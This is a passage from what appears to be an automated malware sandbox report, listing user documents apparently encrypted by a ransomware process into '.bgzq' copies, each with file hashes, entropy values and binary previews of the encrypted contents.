                                                                                                Preview:ZIPXY.....<.].(..cK..u.9..l. y..~..*...c.Gv(.|.....!t...Z...%.8.&...ow.iM.........<&.%..P..E.ai<..g[)U.V.:>.P..?u........>.K......N............p.i/.S....v^7S..1..>.n......-.q..7H.*f....d.(^.m........7C{.k.*<........I .......e?ON.J.k...t.H........N.84..>.kr;B.......]..[..3.T. 7j......V?.J.. .I..*L.;..Uz....B.aF[...>0xr+.qP=G.rj....>.Pgq.2N.....Dz.G..n..r.z~..x#p.]u..6`..*.6.wq.s{%d...h.>.R&V+..C.A,.\.g ..x].pb...T.....'.O.h.hq(Y`..k0:.j>...y..f..<2b..~.9.&A..4...7..ul.i..<..{..}"{.F......7.,..2....v..1.q.o.>h.!..6.+..E.....5...U8.....|...qT.3....d...S....t..U.....GS..=9....f..C.0;C.4......z(v....L..}..FM.Iw.t.q..o...x.u..l..!..1..+...\.v.....$.t;P..7J.|.L.6.3.Gy.N.{@|.......C~Q..s..%...`*...O..Q....N..'.....4..B.0..g...\..u..P..7..y_D..b.....jf}...4......2..{..j.?....s,.....&...t.#]J.3.MIC.~>^.k....47.......!..p../KXA......No.a...?...N4.y.7..jy....N.p...X..o8b....H....fA_....}.Z..NX.O..$.;..;.T.n..T.,!d..En.m...>Cx.OO..0......Y..I..w.|.....

                                                                                                C:\Users\user\Documents\PALRGUCVEH.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.851874246831316
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K0viXdntWLUmveTzA5EdkV7bJT15O/0FrgEmrtxXm3fYBgwRVOs74xy+QX3XfzIX:K1tWLX5EdkVRT1s0FrgEmrtU30os74Mq
                                                                                                MD5:7F119065683A34B1DEF5574E7710A968
                                                                                                SHA1:5107C48B53AB855117B561679B422017038D705D
                                                                                                SHA-256:8D892553900BA6ADDFA8083F17D9FC36A4D8784B350D1CA9108BE970EDDE45A2
                                                                                                SHA-512:163FB051F6B7E20BAD4507E9D1982B7703BE9D7995C4A67B8EC3AFFF51BA999208492814C4CB259926FB7704099BC9EFF93F45F1E8506B491D09E385BEB03472
                                                                                                Malicious:false
                                                                                                Preview:PALRG.{....RB!.y.<0...:..JB...J..4...k...=/W.n....OM..P........7ua._.+.5sD.E..J'{..<..Rq..;..:Z.....XIR!..:w|..pJ.['q.............P...y1.....x$L...e..u..e..4...W.U.u.*...$.t.C...'.....K..l..r.|.| h../......x........<....[Bt..m.d...y...v!y*67RjM...0.].Z4..A.z..~i.I.z.....0..G4.X.i...~j...t.!\..E....W .9.rN.&.H.xjq.4x.{...b.J.O...nc4.."G......1.`h......"...]..Xmu.9}^a..D..\;....UD.w..I..o...8.b....g..Q-!....[z.3e..A..w.3d....^.|.g.......w....R}.B...f.{.:.y.H7\.s.O..M...$.?W7.....Y.~/.....j.(>.*&=.HmPR!..eu.\.]..u......k..-..J.......T.gQ.....2or3..>..:....I..p..`.s.7...v..&X*[@..5....G.g..k......e.1...l.Oi..&l..7...:..98}.R.......F....L~..<.N..8.....o<.e.Q....\.>.V.G.C&.#....S[.Y......X..xVc....1......y.I[..T..sy.y..kI."i\0...(.u7..Bd.F..M|(.....S:r.i..>>..6.....a...yl.g......F...j..[Y.r...M..V2....Sgr0C.@..U9.3.W6hbC).Mdzv.N...z.3....,(Sx.....l?..3l.$/m..\...2:w.\.=goR.v.VyP...i.m[.w...j..E....dwj.....(.f.I.a.^..$..#...B.......7.2..4....i...

                                                                                                C:\Users\user\Documents\PALRGUCVEH.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.851874246831316
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K0viXdntWLUmveTzA5EdkV7bJT15O/0FrgEmrtxXm3fYBgwRVOs74xy+QX3XfzIX:K1tWLX5EdkVRT1s0FrgEmrtU30os74Mq
                                                                                                MD5:7F119065683A34B1DEF5574E7710A968
                                                                                                SHA1:5107C48B53AB855117B561679B422017038D705D
                                                                                                SHA-256:8D892553900BA6ADDFA8083F17D9FC36A4D8784B350D1CA9108BE970EDDE45A2
                                                                                                SHA-512:163FB051F6B7E20BAD4507E9D1982B7703BE9D7995C4A67B8EC3AFFF51BA999208492814C4CB259926FB7704099BC9EFF93F45F1E8506B491D09E385BEB03472
                                                                                                Malicious:false
                                                                                                Preview:PALRG.{....RB!.y.<0...:..JB...J..4...k...=/W.n....OM..P........7ua._.+.5sD.E..J'{..<..Rq..;..:Z.....XIR!..:w|..pJ.['q.............P...y1.....x$L...e..u..e..4...W.U.u.*...$.t.C...'.....K..l..r.|.| h../......x........<....[Bt..m.d...y...v!y*67RjM...0.].Z4..A.z..~i.I.z.....0..G4.X.i...~j...t.!\..E....W .9.rN.&.H.xjq.4x.{...b.J.O...nc4.."G......1.`h......"...]..Xmu.9}^a..D..\;....UD.w..I..o...8.b....g..Q-!....[z.3e..A..w.3d....^.|.g.......w....R}.B...f.{.:.y.H7\.s.O..M...$.?W7.....Y.~/.....j.(>.*&=.HmPR!..eu.\.]..u......k..-..J.......T.gQ.....2or3..>..:....I..p..`.s.7...v..&X*[@..5....G.g..k......e.1...l.Oi..&l..7...:..98}.R.......F....L~..<.N..8.....o<.e.Q....\.>.V.G.C&.#....S[.Y......X..xVc....1......y.I[..T..sy.y..kI."i\0...(.u7..Bd.F..M|(.....S:r.i..>>..6.....a...yl.g......F...j..[Y.r...M..V2....Sgr0C.@..U9.3.W6hbC).Mdzv.N...z.3....,(Sx.....l?..3l.$/m..\...2:w.\.=goR.v.VyP...i.m[.w...j..E....dwj.....(.f.I.a.^..$..#...B.......7.2..4....i...

                                                                                                C:\Users\user\Documents\PALRGUCVEH.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.866415946847877
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZlVig1gFxWl320tNebaMHe467bPAC2wZg27TXfzIbD:D14Is0tQxHv6nR2wZg27bfzSD
                                                                                                MD5:0FD938416FA2251463138EF81590483D
                                                                                                SHA1:87F7CB113F646481883721F76959B4B18A9BAEA8
                                                                                                SHA-256:8F108DB7369C11ED189E50815F5029CF1CC9E5E6ED387B30888BDCB331A940CE
                                                                                                SHA-512:ED99D7A1BDFD3EDDADDD7715EC6E3034C55C938AAC4A3B39315DC7C47DB6963D30CC5EFF1B518D07148DC77D3659050B2CE7486619C05D3D17C3FA2FD630FF60
                                                                                                Malicious:false
                                                                                                Preview:PALRG.......uL........6.-"...E.<..^_M7.. ,".a..........._?x.l!.....zH0.D...Y..;.F1I...c7.*..T..Hp.;qM\.....V./..A.G..G......fY`....9..@.t.h.........I..p.....~x..Vw..%a.iQRJy.s..ZJ.%...a#.{t.1....v.s\.........}.<....*.@.b...fi.....V.V."P.......6]....."..M.a...|Z.s...!(.O=io.H....T..d..V..T.d.=..w..S........l7....|.....k..........nlo......d.v.8.............$..'W..B.p-1y.v.=E..7MT........U..A..>.8M....R.E%...Y]..o...2_...B...N.E.q..}.|...\E5...z....v..c.q.....P.t..l.:@'.h........z..$....}.....fr...5L1...;tc.my..Rs."J\.N..3.)G.......'....#?.6a...6..B...b.=....2..(.I.!F..........=.....%..|Gt...caRT...o..v......;..hF.*1m.....#.!.......7.V..r..R..+).w.....g. ..mE'uj.@.pd.....z.?Cq...1.<@...|*...W.o...up....3.x.....H^.D.O.^.J..O ..Q.d..i.#.....f.....)a..$..ux..#...q.Y.O.z.U.>..1....S.Qx...e..`.t...`.......m..A9...X....x..Jt].......2E..*..../.......(...a.Y.+..*..%...g.c.vM()..e{.3...P@J....W.n0.<..eE.....r.I#41..Q"./...p.L.C..f.......s!.F

                                                                                                C:\Users\user\Documents\PALRGUCVEH.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.866415946847877
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZlVig1gFxWl320tNebaMHe467bPAC2wZg27TXfzIbD:D14Is0tQxHv6nR2wZg27bfzSD
                                                                                                MD5:0FD938416FA2251463138EF81590483D
                                                                                                SHA1:87F7CB113F646481883721F76959B4B18A9BAEA8
                                                                                                SHA-256:8F108DB7369C11ED189E50815F5029CF1CC9E5E6ED387B30888BDCB331A940CE
                                                                                                SHA-512:ED99D7A1BDFD3EDDADDD7715EC6E3034C55C938AAC4A3B39315DC7C47DB6963D30CC5EFF1B518D07148DC77D3659050B2CE7486619C05D3D17C3FA2FD630FF60
                                                                                                Malicious:false
                                                                                                Preview:PALRG.......uL........6.-"...E.<..^_M7.. ,".a..........._?x.l!.....zH0.D...Y..;.F1I...c7.*..T..Hp.;qM\.....V./..A.G..G......fY`....9..@.t.h.........I..p.....~x..Vw..%a.iQRJy.s..ZJ.%...a#.{t.1....v.s\.........}.<....*.@.b...fi.....V.V."P.......6]....."..M.a...|Z.s...!(.O=io.H....T..d..V..T.d.=..w..S........l7....|.....k..........nlo......d.v.8.............$..'W..B.p-1y.v.=E..7MT........U..A..>.8M....R.E%...Y]..o...2_...B...N.E.q..}.|...\E5...z....v..c.q.....P.t..l.:@'.h........z..$....}.....fr...5L1...;tc.my..Rs."J\.N..3.)G.......'....#?.6a...6..B...b.=....2..(.I.!F..........=.....%..|Gt...caRT...o..v......;..hF.*1m.....#.!.......7.V..r..R..+).w.....g. ..mE'uj.@.pd.....z.?Cq...1.<@...|*...W.o...up....3.x.....H^.D.O.^.J..O ..Q.d..i.#.....f.....)a..$..ux..#...q.Y.O.z.U.>..1....S.Qx...e..`.t...`.......m..A9...X....x..Jt].......2E..*..../.......(...a.Y.+..*..%...g.c.vM()..e{.3...P@J....W.n0.<..eE.....r.I#41..Q"./...p.L.C..f.......s!.F

                                                                                                C:\Users\user\Documents\QCOILOQIKC.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.839216164046254
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:LR/7Nz3Z+6930CMQvCPci42wMw3pYZFQDeRO1Vv2xFsGxk0pFcKXfzIbD:Lt7dplECiB4T53P/8/nFjfzSD
                                                                                                MD5:3F5311CE7FEBADD9C0C36E813A898B30
                                                                                                SHA1:6F7F263EE3F97CEDFACE8C8546F89FCFAB2684D5
                                                                                                SHA-256:5446002FE06E77144217256513643966768FB4292B12275FE1EC0665562B586A
                                                                                                SHA-512:0BAB0E89B15F9EE7790B7F413B5A9048B75461A40A2BD8131E96192CCE91DB2ABCF81D4F4C9A7486714AE73D7EF479A078628F54132E8075FE29D355A2EA855D
                                                                                                Malicious:false
                                                                                                Preview:QCOIL..b...R#..u...W."k.IE U1xW7.6..&.|o.q..6...-..4....AY.y..U.-.O.b.2%T.....5.m'...o....6a.K..>.......z5.X>...o.^....^......5mx...8p..6M..M..]W.E.IY:.-.W.y.x..0.~ h.2'....q..9#.{i.m...lF.6r...*.*...........r.:....TI.L.?.h...&..,w....V.....Y.+.;...2..`.>.YQp.f$..GIy.^.3EM.....5.Z.)"W....A.0z..?...i.&)a.....Uz./I..X.Q..Sx...#}.R......k..f.....7kL.kcR$.....n.X..[U...|..dx..Q....cN$...1V...e..Hv7........po&.g.....zW[..sH...Q......./.=7.K.U.2.z......zt....;3....>..%a.Q.g:.N.....P..tb...q..-.#r%......t..t.e."...5@"b...]D....~|.b.5....|..n.R.....R..z..m.U..z..`. .L..E!q'.H-.L.d\...6.,..f...0.g8.......$,R...b`.&.8I.L.QYv~.;\e.=uM.`R...].AU-}.\cw.........`...E.......L....5.t....N#;...1H.s.=.K#.PQ[..U@+.....L(...h..Cv...Js.9.......#.F.G..rXaZs...?.a..a....p`..*....&cG....=...^9?o....N.w.....<F..C[....)...C.;.#.\..Fx].ma...v..@..k...H.=...]....,$...ck.o.".N..B..wgiMY..q.Vg.6... D.%..^@@.?.N.^*......V..`....cx..si>........@{.)....+.t....)Y.k.h..Z

                                                                                                C:\Users\user\Documents\QCOILOQIKC.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.839216164046254
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:LR/7Nz3Z+6930CMQvCPci42wMw3pYZFQDeRO1Vv2xFsGxk0pFcKXfzIbD:Lt7dplECiB4T53P/8/nFjfzSD
                                                                                                MD5:3F5311CE7FEBADD9C0C36E813A898B30
                                                                                                SHA1:6F7F263EE3F97CEDFACE8C8546F89FCFAB2684D5
                                                                                                SHA-256:5446002FE06E77144217256513643966768FB4292B12275FE1EC0665562B586A
                                                                                                SHA-512:0BAB0E89B15F9EE7790B7F413B5A9048B75461A40A2BD8131E96192CCE91DB2ABCF81D4F4C9A7486714AE73D7EF479A078628F54132E8075FE29D355A2EA855D
                                                                                                Malicious:false
                                                                                                Preview:QCOIL..b...R#..u...W."k.IE U1xW7.6..&.|o.q..6...-..4....AY.y..U.-.O.b.2%T.....5.m'...o....6a.K..>.......z5.X>...o.^....^......5mx...8p..6M..M..]W.E.IY:.-.W.y.x..0.~ h.2'....q..9#.{i.m...lF.6r...*.*...........r.:....TI.L.?.h...&..,w....V.....Y.+.;...2..`.>.YQp.f$..GIy.^.3EM.....5.Z.)"W....A.0z..?...i.&)a.....Uz./I..X.Q..Sx...#}.R......k..f.....7kL.kcR$.....n.X..[U...|..dx..Q....cN$...1V...e..Hv7........po&.g.....zW[..sH...Q......./.=7.K.U.2.z......zt....;3....>..%a.Q.g:.N.....P..tb...q..-.#r%......t..t.e."...5@"b...]D....~|.b.5....|..n.R.....R..z..m.U..z..`. .L..E!q'.H-.L.d\...6.,..f...0.g8.......$,R...b`.&.8I.L.QYv~.;\e.=uM.`R...].AU-}.\cw.........`...E.......L....5.t....N#;...1H.s.=.K#.PQ[..U@+.....L(...h..Cv...Js.9.......#.F.G..rXaZs...?.a..a....p`..*....&cG....=...^9?o....N.w.....<F..C[....)...C.;.#.\..Fx].ma...v..@..k...H.=...]....,$...ck.o.".N..B..wgiMY..q.Vg.6... D.%..^@@.?.N.^*......V..`....cx..si>........@{.)....+.t....)Y.k.h..Z

                                                                                                C:\Users\user\Documents\SQSJKEBWDT.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852154222048218
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jeY62CA3bKVmV9PGGM0a76Yj9Lr/t35P8v44gGnvzOdWEP+jptXfzIbD:4k7M0avdr/tpe44FnvYtP+jplfzSD
                                                                                                MD5:F520370A35F296C63EC7730BC8D0DA04
                                                                                                SHA1:1909655E3BA69B7F53A7F42BCEBDA61EE18D8D43
                                                                                                SHA-256:8030252A4D8C02516F1CE8C975222C0289240D14C2713FEE4F1D05B54DFD220C
                                                                                                SHA-512:2D2523D087144816E611953C22C54AE7A376B340D16E1A929028BC77B6B692C33F1E53A43891061C645AAA29001F3FAADA0A41A4E26DFFD64793669439608964
                                                                                                Malicious:false
                                                                                                Preview:SQSJK.'...|........Q..].}hw3..L.a#..h.....3.........H.F...g.....+W)..L..;&.."..p.vl).R.f..G.j.8f...)... f.h.}.=6... ..-.}.n.`...a~..S.K.&..,V.i~T%.%=..:..r..BZ.9.g.H....s.:y!qIr3xO..}..h..H.wb......l....\..6M.\.Q+.."O..7.<......z.3mMq.Tl..sf...7)j.h.<d..(..P....9......3..1j.....c....F..>py.U.o...H..J/...j.DG0dVr....T..5F./?"..%....)C...1g..$.$EZ ...(...._.k...j..@M\.W.U. .R......2D.%GP.I....B#..D..Ic.H%...Tq.}.....;...6;..+u..B..@..SC^h0...7.K.[.m_y.z-.......M...t....W.n...).Rhs?.I..!.....4...A+.q..'*.s..X.S.P.:Z...q1.....[..m]..a.....`].A...d..b[MX.w.+{....&n.&.oz?.CCe=...Mm(...7.d.D7%.-.....4i.....e....<.....)..^..u...d..s......../..........P.%E.).....I...Y......[8...vR..A.Z..pr...i!...l.....95JV..(h..}...b4o&.l.....X(H.:N4.. .f ........h<..:K.]..../.....sv..NX.@..x..(.K}5..uM.0.uA..y...{........R....<KX......{.6.......P...1..3r........j".`.DX...+....._<&....p,h....J..........]..........#?K-..Em.$.*..O.....4..<x?.oR.B....?.^>%Oe...N.j.

                                                                                                C:\Users\user\Documents\SQSJKEBWDT.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852154222048218
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jeY62CA3bKVmV9PGGM0a76Yj9Lr/t35P8v44gGnvzOdWEP+jptXfzIbD:4k7M0avdr/tpe44FnvYtP+jplfzSD
                                                                                                MD5:F520370A35F296C63EC7730BC8D0DA04
                                                                                                SHA1:1909655E3BA69B7F53A7F42BCEBDA61EE18D8D43
                                                                                                SHA-256:8030252A4D8C02516F1CE8C975222C0289240D14C2713FEE4F1D05B54DFD220C
                                                                                                SHA-512:2D2523D087144816E611953C22C54AE7A376B340D16E1A929028BC77B6B692C33F1E53A43891061C645AAA29001F3FAADA0A41A4E26DFFD64793669439608964
                                                                                                Malicious:false
                                                                                                Preview:SQSJK.'...|........Q..].}hw3..L.a#..h.....3.........H.F...g.....+W)..L..;&.."..p.vl).R.f..G.j.8f...)... f.h.}.=6... ..-.}.n.`...a~..S.K.&..,V.i~T%.%=..:..r..BZ.9.g.H....s.:y!qIr3xO..}..h..H.wb......l....\..6M.\.Q+.."O..7.<......z.3mMq.Tl..sf...7)j.h.<d..(..P....9......3..1j.....c....F..>py.U.o...H..J/...j.DG0dVr....T..5F./?"..%....)C...1g..$.$EZ ...(...._.k...j..@M\.W.U. .R......2D.%GP.I....B#..D..Ic.H%...Tq.}.....;...6;..+u..B..@..SC^h0...7.K.[.m_y.z-.......M...t....W.n...).Rhs?.I..!.....4...A+.q..'*.s..X.S.P.:Z...q1.....[..m]..a.....`].A...d..b[MX.w.+{....&n.&.oz?.CCe=...Mm(...7.d.D7%.-.....4i.....e....<.....)..^..u...d..s......../..........P.%E.).....I...Y......[8...vR..A.Z..pr...i!...l.....95JV..(h..}...b4o&.l.....X(H.:N4.. .f ........h<..:K.]..../.....sv..NX.@..x..(.K}5..uM.0.uA..y...{........R....<KX......{.6.......P...1..3r........j".`.DX...+....._<&....p,h....J..........]..........#?K-..Em.$.*..O.....4..<x?.oR.B....?.^>%Oe...N.j.

                                                                                                C:\Users\user\Documents\SQSJKEBWDT.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.870569667877803
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bGMDvHKijDqS1BSbjMkD7aO4epB3EfF6PTBYrqGgktMZMZDXfzIbD:bGMjHKEGjMkXrYFiBYWHfwfzSD
                                                                                                MD5:1797064AED8B56EFA679BFF6D2FD25D2
                                                                                                SHA1:51DA97E9A8392B029917452C10FFC1741C704DC3
                                                                                                SHA-256:F79FEE2948484061A442CF3605962373C9DDE20E20C7A36FED4892D2692D91B4
                                                                                                SHA-512:04F8E920DD3878E9AEF8C3432FD1093FFCBAECB797D81BA673CDE3A4A8B8AE12DF97D1FB804D203F74904AD998A472335CD0CAC63E0746E271A20ABF2D9F04D3
                                                                                                Malicious:false
                                                                                                Preview:SQSJKpk.".Q.fY.....X..4jE7..&.l...(....F..........IC..W..2=,b....R....D.&."....P.d..h...ka.>He.x.$}I].*.DM.f....P..0.x.<.............)/._.<..T?...0n...w.q..i..............`..YqX..h.|v.K...8n......Cl..f........A$ ....64\..'..-..v.Y.5.....S.#..7.[E.".A.J.C^.....k.~; r_+.9.s....-.h..|.)J..O>D....Wa...0..1.....D....\V.c......~...!.?.\...7.{...;.+\o........ .6T..V9.....-.:z....,.#?.c.Js.U..O}Q.^....R,:.....+....W.../.5..A......w.........8...L.......)Iq...FB..>.^.N.F.OF@.kb.#7A.\qv8.....l.y..|.S..m....a...hs\.Y..;..C.u..;G.\...C|.kF<./...s.59":......1..._.....}.....N&..EM...k..A.!.j......a.....TB.=qK......#..D.......4|.....R.Q...'.[.....JuYp..D.h......L.L...$.&..)...8..;.....2N.S.].r*:.jH.E.1.......N.`..8.T..]..U."..p[.&Jz...S._.y...2.&,.pm.....*.H....8..#0..3..p.O..x...P.5.dT...>...M...(...e.~......AQ.G.."OI.........7....m.....<WX.P......}..~y...)e..l.,rJ...E2.X..@.J_..Z..'.FW.KS..Sd.q%.X....yr.....Z.P....0}..S".CA.cm..H........

                                                                                                C:\Users\user\Documents\SQSJKEBWDT.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.870569667877803
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bGMDvHKijDqS1BSbjMkD7aO4epB3EfF6PTBYrqGgktMZMZDXfzIbD:bGMjHKEGjMkXrYFiBYWHfwfzSD
                                                                                                MD5:1797064AED8B56EFA679BFF6D2FD25D2
                                                                                                SHA1:51DA97E9A8392B029917452C10FFC1741C704DC3
                                                                                                SHA-256:F79FEE2948484061A442CF3605962373C9DDE20E20C7A36FED4892D2692D91B4
                                                                                                SHA-512:04F8E920DD3878E9AEF8C3432FD1093FFCBAECB797D81BA673CDE3A4A8B8AE12DF97D1FB804D203F74904AD998A472335CD0CAC63E0746E271A20ABF2D9F04D3
                                                                                                Malicious:false
                                                                                                Preview:SQSJKpk.".Q.fY.....X..4jE7..&.l...(....F..........IC..W..2=,b....R....D.&."....P.d..h...ka.>He.x.$}I].*.DM.f....P..0.x.<.............)/._.<..T?...0n...w.q..i..............`..YqX..h.|v.K...8n......Cl..f........A$ ....64\..'..-..v.Y.5.....S.#..7.[E.".A.J.C^.....k.~; r_+.9.s....-.h..|.)J..O>D....Wa...0..1.....D....\V.c......~...!.?.\...7.{...;.+\o........ .6T..V9.....-.:z....,.#?.c.Js.U..O}Q.^....R,:.....+....W.../.5..A......w.........8...L.......)Iq...FB..>.^.N.F.OF@.kb.#7A.\qv8.....l.y..|.S..m....a...hs\.Y..;..C.u..;G.\...C|.kF<./...s.59":......1..._.....}.....N&..EM...k..A.!.j......a.....TB.=qK......#..D.......4|.....R.Q...'.[.....JuYp..D.h......L.L...$.&..)...8..;.....2N.S.].r*:.jH.E.1.......N.`..8.T..]..U."..p[.&Jz...S._.y...2.&,.pm.....*.H....8..#0..3..p.O..x...P.5.dT...>...M...(...e.~......AQ.G.."OI.........7....m.....<WX.P......}..~y...)e..l.,rJ...E2.X..@.J_..Z..'.FW.KS..Sd.q%.X....yr.....Z.P....0}..S".CA.cm..H........

                                                                                                C:\Users\user\Documents\SQSJKEBWDT\EIVQSAOTAQ.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852758123488995
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RkCOU7YIEeRLuQgbyPyBik9xfG4o69iAE/ZCEjSr9kuXgv1AuL/fe0NJkWP2MPMG:KCOuEeRLmWP4Bfl6BhQgv1x/fPN92MPH
                                                                                                MD5:62508EF87AC0147DD01088ACC7EFD71F
                                                                                                SHA1:4803C49734B067D5D3AD12C566BE1880286305EB
                                                                                                SHA-256:FAE33EAD061218F497C3B1FC4AA5261FE3DB845F0E407BD68184254C5CAA77E9
                                                                                                SHA-512:2793D429E77FE64541FFAC815033615843CE8DCC8B709138D0FD599623A73389DDF9522211311EFC6D144357F642F1BF48C945557067435A6355E16DCC1A2399
                                                                                                Malicious:false
                                                                                                Preview:EIVQSV......V.Qv......]..g......j..!..I2[.$.-..b.Y....)..H...q..u..C.n.P....{O>...<O.....E..<....80.@R#d~.0g..*...[.B..O...Y.RG..h5 ...bO..3.|0.r...RWu..nw..c.#X..........fb..yrwW..z.B`..K.<.u.6'.8..<..F...V2.....qX..@1..g.7+.u.e..i...9o..6....)."*a[......F.Z.3M{.yLX..O. .LU...eX/.Y.~oF.U.4.....3......e..#...i/...-.....8....h....|...y..$^M|i..".C{.q.I..........|.....&.._........A.>....U=p.2.*.8..K.@.2. .d..Zw...8.?...f&a9Sl...r..W.Y.c....oq..[.Z...i.J..|&ac.?M1...#.]..~W.....r......K.0'H6..p*L.DT.z......[O..UG...YG.....~.....u3.....(LT.R..1Zo~T.SW..X...b....)T.x...D.....#B+..F_MS.~.5*.p...5k..d....M.}&.q....".j......(_E...C......6....d.<...t|8..4.G3.....;...r..Vjp>.x-s0.t........7......E...D.....G:o....&r..~o...$.<...%...1m4...sM%...J..........{z..f;..9....i.........+&.>.;.R..>.....c..!..3...Y...].Nc_..4ZL..x.....A`}.......,..R....i..G9..\.N.fT..I...O~..Z.....A+...G...R..0.*yn. ..=...k....y......d\.....z.j.0J...K..m.....+......F9!PQqD.

                                                                                                C:\Users\user\Documents\SQSJKEBWDT\EIVQSAOTAQ.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852758123488995
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RkCOU7YIEeRLuQgbyPyBik9xfG4o69iAE/ZCEjSr9kuXgv1AuL/fe0NJkWP2MPMG:KCOuEeRLmWP4Bfl6BhQgv1x/fPN92MPH
                                                                                                MD5:62508EF87AC0147DD01088ACC7EFD71F
                                                                                                SHA1:4803C49734B067D5D3AD12C566BE1880286305EB
                                                                                                SHA-256:FAE33EAD061218F497C3B1FC4AA5261FE3DB845F0E407BD68184254C5CAA77E9
                                                                                                SHA-512:2793D429E77FE64541FFAC815033615843CE8DCC8B709138D0FD599623A73389DDF9522211311EFC6D144357F642F1BF48C945557067435A6355E16DCC1A2399
                                                                                                Malicious:false
                                                                                                Preview:EIVQSV......V.Qv......]..g......j..!..I2[.$.-..b.Y....)..H...q..u..C.n.P....{O>...<O.....E..<....80.@R#d~.0g..*...[.B..O...Y.RG..h5 ...bO..3.|0.r...RWu..nw..c.#X..........fb..yrwW..z.B`..K.<.u.6'.8..<..F...V2.....qX..@1..g.7+.u.e..i...9o..6....)."*a[......F.Z.3M{.yLX..O. .LU...eX/.Y.~oF.U.4.....3......e..#...i/...-.....8....h....|...y..$^M|i..".C{.q.I..........|.....&.._........A.>....U=p.2.*.8..K.@.2. .d..Zw...8.?...f&a9Sl...r..W.Y.c....oq..[.Z...i.J..|&ac.?M1...#.]..~W.....r......K.0'H6..p*L.DT.z......[O..UG...YG.....~.....u3.....(LT.R..1Zo~T.SW..X...b....)T.x...D.....#B+..F_MS.~.5*.p...5k..d....M.}&.q....".j......(_E...C......6....d.<...t|8..4.G3.....;...r..Vjp>.x-s0.t........7......E...D.....G:o....&r..~o...$.<...%...1m4...sM%...J..........{z..f;..9....i.........+&.>.;.R..>.....c..!..3...Y...].Nc_..4ZL..x.....A`}.......,..R....i..G9..\.N.fT..I...O~..Z.....A+...G...R..0.*yn. ..=...k....y......d\.....z.j.0J...K..m.....+......F9!PQqD.

                                                                                                C:\Users\user\Documents\SQSJKEBWDT\EOWRVPQCCS.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8394839803742045
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4TE1JqbRyP+OwW/bh5sXm1LqgFulWfbRdU4PAwTvp0T7CSJYCfAHLfKyBiXfzIbD:4TQJqtyrumJqgclo9KHwF0nCEBAHeu0u
                                                                                                MD5:30BFA5C3F1073CFE02B4DC73F419A5D9
                                                                                                SHA1:46E9B3F622BAD3EB457BBE5FFC52C8590B606D58
                                                                                                SHA-256:E99B2562EAC1B373BE20B6061747412CC668096A2278C3298000E5803048B9F2
